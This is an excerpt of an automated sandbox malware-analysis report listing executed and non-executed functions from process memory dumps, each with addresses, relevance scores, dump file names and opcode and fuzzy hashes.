                                                                                              • Instruction Fuzzy Hash: E6F0E53571EA59CFC781AB38DC999D47F60EB47215B9A14FAC08AC7562C220586ECB84
                                                                                              Function 00007FFD9BAB1CDA Relevance: .0, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction ID: 2ced4873bd6c1b211eb600929b4f24dc420fd1bd5cbcbe1805e14925a6238b29
                                                                                              • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction Fuzzy Hash: 8CF03030F1D42E4AEAB0D758C8647B83352EF90711F5543B5C01D932F1DD696A428E40
                                                                                              Function 00007FFD9BAB42E9 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7ea79261219f15db74508349b46297bc5ad0862374afab13f9585330628e7fa
                                                                                              • Instruction ID: 371955ef7ed5da3dacfe4e988f939dfd6c1017ebd0458260f42dd4585429c13f
                                                                                              • Opcode Fuzzy Hash: a7ea79261219f15db74508349b46297bc5ad0862374afab13f9585330628e7fa
                                                                                              • Instruction Fuzzy Hash: 17F02270518A1C8FCF98DB08C495EE9B7F1FB68305F114599D14AE7260CB31AA80CF85
                                                                                              Function 00007FFD9BAB2AD5 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: ccb4013efbf6993cff1f18f13554963fe7b665062b8ed2367999b6ef2223c7a1
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: 0FE01230E0D12A46FBB49754D8617F962A0DB54300F1110B8D51E933D1DD78AF818E49
                                                                                              Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: 713134b87c52066abafe22df5a3b0f9000d6f810c223d6d783dd219e3f7e1076
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 7CC04C05F5B53F01F43577EF54760ACB1409BD5A10FD70176D52D800E19CED26D5495E
                                                                                              Function 00007FFD9BAB1310 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction ID: 6a8a9a6bf83a003ca13e4a08532d72422746f823f0dda13da2124eca4c4eed35
                                                                                              • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction Fuzzy Hash: E8C08C3051180C8FC908EB28C88480433A0FB09300BC20090E009C7270E65ADDC2CB40
                                                                                              Function 00007FFD9BAB4E17 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: 03d477ccb4175055202313fbebcd53292deebeac5553f9cd479d896b3342e71a
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: 97C08CA1E2822945E37486A0482A1AA73818F01220F6286B2806DA70A1EE6896426A80
                                                                                              Function 00007FFD9BAB2555 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2339d94c14f1e7370adb22539f0ebec5a9acd5ec958e0a854189be2a3f6a9857
                                                                                              • Instruction ID: e0a32b87d9f7dee334ac414f89bfc64b4487163a3633bce9ede492b5e5b56949
                                                                                              • Opcode Fuzzy Hash: 2339d94c14f1e7370adb22539f0ebec5a9acd5ec958e0a854189be2a3f6a9857
                                                                                              • Instruction Fuzzy Hash: E9C04C05F2882A07F35A6614443167E04835F54768F5546B4E01EC76DECD5C5E621AC7
                                                                                              Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: 3c7e3ebd94f208d2fcbfa463022b6d09dde85837b0625a7963d51f888e9b4b46
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: E9B01200E5741F00E43433FB08B20A870409B44100FC20070D41D8009198DD16940646

                                                                                              Non-executed Functions

                                                                                              Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000034.00000002.2287109869.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_52_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: 64295ce63d89b9c75ab817259eb6315a6be831e1ddee33239c49bc918e967d57
                                                                                              • Instruction ID: ee0e26a1e1c57ffd8ab351f7d2016590dd2b112039a0fad7042e754bedb5fd9d
                                                                                              • Opcode Fuzzy Hash: 64295ce63d89b9c75ab817259eb6315a6be831e1ddee33239c49bc918e967d57
                                                                                              • Instruction Fuzzy Hash: DB41AE07B0953646E23973FD78229ED5B848FA927FB0847B7F56E8D0D74C486081C2E9

                                                                                              Executed Functions

                                                                                              Function 00007FFD9BAA0D78 Relevance: .3, Instructions: 261COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e298924558cdf75836356de80b6b6ce24da7b4dcdffe246a24136d95157e07a1
                                                                                              • Instruction ID: 3057145fd8dcbd557d3c9d4f11f4b30b69ef3ebf83dd91c1fd982a401da09fb4
                                                                                              • Opcode Fuzzy Hash: e298924558cdf75836356de80b6b6ce24da7b4dcdffe246a24136d95157e07a1
                                                                                              • Instruction Fuzzy Hash: AD910372A18A8E4FE799DB688865BA97FE1FF99310F0001BED04DD72DACBB41815C750
                                                                                              Function 00007FFD9BAA08E8 Relevance: .1, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 596f4c78ed5f81c6e6c0533246ad394b3462272b50f7c3d4b4af88e82da2c9b8
                                                                                              • Instruction ID: ef5fbe12199d23f78f9465fe2103630e558dd08619b163c7e8fdabb94f322d64
                                                                                              • Opcode Fuzzy Hash: 596f4c78ed5f81c6e6c0533246ad394b3462272b50f7c3d4b4af88e82da2c9b8
                                                                                              • Instruction Fuzzy Hash: C231453130D9184FDB68EB5CE89A9B977D1EF8932131501BBE48AC7176DD11EC8287C1
                                                                                              Function 00007FFD9BAA0998 Relevance: .1, Instructions: 98COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6307cf6b14e928487153d3883c4b960fcffa29b4ffd1c21285bf3c0f290c55c1
                                                                                              • Instruction ID: fbafab121d8405f85b03db1101e74b647bf9427c5d853f3437fde4d1f8bfbc6b
                                                                                              • Opcode Fuzzy Hash: 6307cf6b14e928487153d3883c4b960fcffa29b4ffd1c21285bf3c0f290c55c1
                                                                                              • Instruction Fuzzy Hash: C9213621B19D1D0FE768B76C946AA79B6C7DF99321F0101B9E80EC32F6DC54AC414291
                                                                                              Function 00007FFD9BAA119D Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0327eba3f906cc6467ce625444e40bd4178ac4196851a1cf31603b97a8fe9f2
                                                                                              • Instruction ID: dde9e36c2460550f6157f906213e23e4e3db1c2d4616664fd46a6bd53cc45487
                                                                                              • Opcode Fuzzy Hash: c0327eba3f906cc6467ce625444e40bd4178ac4196851a1cf31603b97a8fe9f2
                                                                                              • Instruction Fuzzy Hash: 0431B831A0954E8FDB95EB68C8649BD7BF1FF6A300F0545BBC049D72A2DE64A540CB50
                                                                                              Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3335919d2c6e63ce75fdfda523993ec9479fbeb03512a89b05ca0514e28ced22
                                                                                              • Instruction ID: 5c6b92bafbd1c4b94b93d5554952fadbf8b7e4ac8ffa734e0b82fed98ef96cdb
                                                                                              • Opcode Fuzzy Hash: 3335919d2c6e63ce75fdfda523993ec9479fbeb03512a89b05ca0514e28ced22
                                                                                              • Instruction Fuzzy Hash: E1210736B0D24D4AE732ABA898610DC7B60EF81325F0546B3D05CCF1D3D968264AC7A5
                                                                                              Function 00007FFD9BAA1B9F Relevance: .1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ac3c9bc8c716dc504ffa429cf03ca426346652c33d75f25f0544f67aa458dc4e
                                                                                              • Instruction ID: f0344ae99497d8b3ce69669b44582ea662fd5eb530a836cb94debab1190c11b1
                                                                                              • Opcode Fuzzy Hash: ac3c9bc8c716dc504ffa429cf03ca426346652c33d75f25f0544f67aa458dc4e
                                                                                              • Instruction Fuzzy Hash: 47216221F0E90E5BEBB4E76884646B862D3EF95710F4642B5D00EC72F2EDA8AE41C754
                                                                                              Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8ae14cd04305e3687a400c8ed58d5ec676d19df50722d29e2809d28cae50ff32
                                                                                              • Instruction ID: ee3e5238a3670d99645fcfcd6a25887a54f6e31eedcdb13f2403f581200cded0
                                                                                              • Opcode Fuzzy Hash: 8ae14cd04305e3687a400c8ed58d5ec676d19df50722d29e2809d28cae50ff32
                                                                                              • Instruction Fuzzy Hash: 9711A135A0E28D9FE722DFA8886019C7FB1EF42711F0645F7D048DB1A2D57466498764
                                                                                              Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ff9ee0a9b2356f0109076b3f41e4a4fae50f0fa480aed1388e41d9444b705a9f
                                                                                              • Instruction ID: 47d7e5d13c262c3372b59d6d2ab8ae84b03f45a1263f12c989df84604a467376
                                                                                              • Opcode Fuzzy Hash: ff9ee0a9b2356f0109076b3f41e4a4fae50f0fa480aed1388e41d9444b705a9f
                                                                                              • Instruction Fuzzy Hash: BB019235A0E38D9FD722DFA4C86019CBFB1EF06710F1641E7D048DB1A2D57466458764
                                                                                              Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6972e715cee46fea15727880a09f83d8bcc71e185d0e0b929535a71ec95cf017
                                                                                              • Instruction ID: cadb3b4ab4f03696c4086759dd291f18fb822f89a0bcbf4b23ce3b0d19e1d81d
                                                                                              • Opcode Fuzzy Hash: 6972e715cee46fea15727880a09f83d8bcc71e185d0e0b929535a71ec95cf017
                                                                                              • Instruction Fuzzy Hash: 0D018435E0E38D9FE721DFA488A059CBFB1EF06704F1541E7D048DB1A2D97867448755
                                                                                              Function 00007FFD9BAA1C2D Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction ID: 3ec7cc7ba45723f7b4b8c421758896821619287a87029bf8238183eb5657f024
                                                                                              • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction Fuzzy Hash: D5F03134A4941F9AEBB4AB54C8647B87363FB51711F4542B9C00DD71E1DEB82A81CB50
                                                                                              Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd3852e97d2e0f820c2be246b407bfd78cf3776febf2094ebfa7a52b98e55e5b
                                                                                              • Instruction ID: 4f8a4f5c50763b6547e8d172721ab41427098affdc8fd07ba5e9582b00eaf5dd
                                                                                              • Opcode Fuzzy Hash: dd3852e97d2e0f820c2be246b407bfd78cf3776febf2094ebfa7a52b98e55e5b
                                                                                              • Instruction Fuzzy Hash: 18F0EC3571E649CFC7419B38DC959D47B60EB4721575614FAC045C7562C2105C6DCB54
                                                                                              Function 00007FFD9BAA1CDA Relevance: .0, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction ID: acd26d11f75ed7367a2f4595323d1b8409acbb3fe45f594cea6a882e8954b2fe
                                                                                              • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction Fuzzy Hash: C1F03020F0D40E5AEAB4D758C8646B87353AF91711F5542B5C00DD72F1DE686A41C650
                                                                                              Function 00007FFD9BAA42E9 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 37d07e7ae6d8f6376555ed24e4aea218d1763d440c633fcfcbe473bb0af43cde
                                                                                              • Instruction ID: 2520c6303cff0c44a2abdaff91efda22ee2ce56836b11e2904bdb1fb7a217d55
                                                                                              • Opcode Fuzzy Hash: 37d07e7ae6d8f6376555ed24e4aea218d1763d440c633fcfcbe473bb0af43cde
                                                                                              • Instruction Fuzzy Hash: 61F02270518A1C8FCF98DB08C495EE9B7F1FB68305F114599914AE7260CB31AA84CF85
                                                                                              Function 00007FFD9BAA2AD5 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: cfc2de5658930fd6e7e7228830e43d3a928dcda84767a8642b57e199a0e6af26
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: E0E01230E0D11A46FBB49754D8617F9A3A2DB54300F1110B8D50E933E1DD78AF41CA59
                                                                                              Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: baf718ed88d573d000fd7f5ce1029a5dbb42e8b88a52bd10751493619a7a9558
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 68C04C05F5B51F01F47577EE54660ACB2425BD5F14FD70172D50D800E19CED22D9417E
                                                                                              Function 00007FFD9BAA1310 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction ID: d13446063b84285c10a692fc5e2f5a9d38e874d28bcbd09c94f111251576bc1a
                                                                                              • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction Fuzzy Hash: F1C08C3051180C8FC948EB28C88481833E0FB09300BC20090E009C7270E259EDC2C740
                                                                                              Function 00007FFD9BAA4E17 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: cf3849daf2c1c817eb2fc8857d947961ed9b6809a5899065ff960a98978b4123
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: 14C08CA1E1821955E3348AA048291AAB3828F01220F528672805DA60A1EE68660296A0
                                                                                              Function 00007FFD9BAA2555 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 950d1519bffdf3ee44e0ba41db169221ae7a28f6984be9db0bbfee96cc86fa88
                                                                                              • Instruction ID: 5fd73a66212834bebe5d3570f3796a44bf42e52e821fc6a24be987e793de8c92
                                                                                              • Opcode Fuzzy Hash: 950d1519bffdf3ee44e0ba41db169221ae7a28f6984be9db0bbfee96cc86fa88
                                                                                              • Instruction Fuzzy Hash: 67C08C01F1882A03F3592204043057E44834F44328F4006B8E00E862DECC0C6A2106C3
                                                                                              Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: f232b9b16ad310d0d4b640a921239e935baeb3df455d050182ddebc41d9e6c0c
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: 3BB01200E5740F00E47433FB08920A870415B44600FC20070D40E80091D8DD22980267

                                                                                              Non-executed Functions

                                                                                              Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000035.00000002.2422491753.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
